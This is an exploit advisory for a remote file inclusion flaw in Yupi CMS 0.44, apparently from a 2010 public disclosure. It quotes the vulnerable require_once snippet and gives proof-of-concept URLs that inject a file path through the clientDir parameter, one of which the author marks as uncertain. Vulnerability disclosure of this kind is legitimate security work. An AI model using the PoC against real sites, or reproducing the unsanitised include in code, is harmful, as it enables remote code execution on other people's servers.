#################################################################################
	Yupi Cms 0.44 <= Remote File Inclusion Vulnerability
#################################################################################

Title: Yupi Cms 0.44 <= Remote File Inclusion Vulnerability
Version: 0.44
Link: http://yupi-cms.com/
License: http://www.opensource.org/licenses/afl-3.0.php
Author: eidelweiss
Contact: eidelweiss[at]cyberservices.com || g1xsystem@windowslive.com
Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris
	Old friend in MEDANHACKER (c02,blackbandit,t0rnado,LordIRC,doegoel,qwert)
Special Thank`s : AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)

#################################################################################
History:

[+] 13 march 2010 : Vend0r (Author) contact
[-] No response
[*] 21 march 2010 (GMT+7): Bug Share to public

NB: This for educational purpose only , Author will not responsible for any damage

## REQUIRES ##


$thisDir = dirname(__FILE__);
$clientDir  = $thisDir;

require_once $clientDir."/config.php"; <-- w0w





define("SC_ROOT_PATH", php_file());

function php_file($filename=""){
   global $Confing;
   $fc = substr($filename,0,1);
   if ($fc=="\\" or $fc =="/"){
      $filename = substr($filename,1);
   }   
   
   $file = $Confing->PhpDir . $filename;
   return $file;

################################################################

P0C:	///filemanager/connectors/php/config.php?clientDir=[inj3ct0r]
	PATH/install/config.php?clientDir=[inj3ct0r] <- Not Sure LOL

################################################################
[ FIX ]	Use Your Skill and Play Your Imagination
################################################################